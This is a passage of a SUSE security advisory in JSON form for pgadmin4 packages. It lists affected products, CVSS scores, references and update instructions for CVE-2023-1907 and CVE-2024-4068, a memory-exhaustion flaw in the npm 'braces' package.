"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2023-1907"
},
{
"cve": "CVE-2024-4068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4068"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4068",
"url": "https://www.suse.com/security/cve/CVE-2024-4068"
},
{
"category": "external",
"summary": "SUSE Bug 1224256 for CVE-2024-4068",
"url": "https://bugzilla.suse.com/1224256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
